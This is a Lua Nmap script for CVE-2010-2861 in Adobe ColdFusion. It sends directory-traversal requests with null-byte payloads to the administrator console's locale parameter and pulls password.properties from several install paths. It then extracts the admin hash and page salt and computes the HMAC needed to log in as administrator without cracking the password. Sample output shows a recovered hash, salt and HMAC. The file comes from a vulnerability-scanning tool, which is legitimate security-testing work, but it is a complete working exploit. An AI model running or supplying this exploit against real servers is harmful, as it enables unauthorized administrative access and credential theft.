scripts/http-vuln-cve2010-2861.nse


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
local vulns = require "vulns"

local openssl = stdnse.silent_require "openssl"

description = [[
Executes a directory traversal attack against a ColdFusion
server and tries to grab the password hash for the administrator user. It
then uses the salt value (hidden in the web page) to create the SHA1
HMAC hash that the web server needs for authentication as admin. You can
pass this value to the ColdFusion server as the admin without cracking
the password hash.
]]

---
-- @see http-adobe-coldfusion-apsa1301.nse
-- @see http-coldfusion-subzero.nse
-- @see http-vuln-cve2009-3960.nse
--
-- @usage
-- nmap --script http-vuln-cve2010-2861 <host>
--
-- @output
-- 80/tcp open  http
-- | http-vuln-cve2010-2861:
-- |   VULNERABLE:
-- |   Adobe ColdFusion enter.cfm Traversal password.properties Information Disclosure
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2010-2861  BID:42342
-- |     Description:
-- |       Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion
-- |       9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter
-- |     Disclosure date: 2010-08-10
-- |     Extra information:
-- |
-- |   ColdFusion8
-- |   HMAC: d6914bef568f8931d0c696cd5f7748596f97db5d
-- |   Salt: 1329446896585
-- |   Hash: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
-- |
-- |     References:
-- |       http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
-- |       https://www.tenable.com/plugins/nessus/48340
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2861
-- |       https://nvd.nist.gov/vuln/detail/CVE-2010-2861
-- |_      https://www.securityfocus.com/bid/42342
--
--
-- This script relies on the service being identified as HTTP or HTTPS. If the
-- ColdFusion server you run this against is on a port other than 80/tcp or 443/tcp
-- then use "nmap -sV" so that nmap discovers the port as an HTTP server.

author = "Micah Hoffman"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "vuln"}


portrule = shortport.http

action = function(host, port)

  local vuln = {
    title = 'Adobe ColdFusion Directory Traversal Vulnerability',
    state = vulns.STATE.NOT_VULN, -- default
    IDS = {CVE = 'CVE-2010-2861', BID = '42342'},
    description = [[
Multiple directory traversal vulnerabilities in the administrator console
in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the
locale parameter]],
    references = {
      'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
      'https://nvd.nist.gov/vuln/detail/CVE-2010-2861',
      'https://www.securityfocus.com/bid/42342',
      'https://www.tenable.com/plugins/nessus/48340',
    },
    dates = {
      disclosure = {year = '2010', month = '08', day = '10'},
    },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- Function to do the look up and return content
  local grabAndGrep = function(page)
    -- Do the HTTP GET request for the page
    local response = http.get(host, port, page)
    -- Check to see if we get a good page returned
    -- Is there no response?
    if ( not(response.status) ) then
      return false, "Received no response from HTTP server"
    end

    -- Is the response not an HTTP 200 code?
    if ( response.status ~= 200 ) then
      return false, ("The server returned an unexpected response (%d)"):format(response.status )
    end

    -- Now check the body for our strings
    if ( response.body ) then
      local saltcontent = response.body:match("salt.*value=\"(%d+)")
      local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password

      -- If a page has both the salt and the password in it then the exploit has been successful
      if ( saltcontent and hashcontent ) then
        vuln.state = vulns.STATE.EXPLOIT
        -- Generate HMAC as this is what the web application needs for authentication as admin
        local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper()
        --return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent)
        local result = {
          ("HMAC: %s"):format(hmaccontent),
          ("Salt: %s"):format(saltcontent),
          ("Hash: %s"):format(hashcontent)
        }
        return true, result
      end
    end
    return false, "Not vulnerable"
  end

  local exploits = {
    ['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
    ['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
    ['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
    ['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
  }

  local results = {}
  for prod, exploit in pairs(exploits) do
    local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
    if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
      if ( "string" == type(result) ) then
        result = { result }
      end
      result.name = prod
      table.insert(results, result )
    end
  end
  vuln.extra_info=stdnse.format_output(true, results)
  return vuln_report:make_output(vuln)
end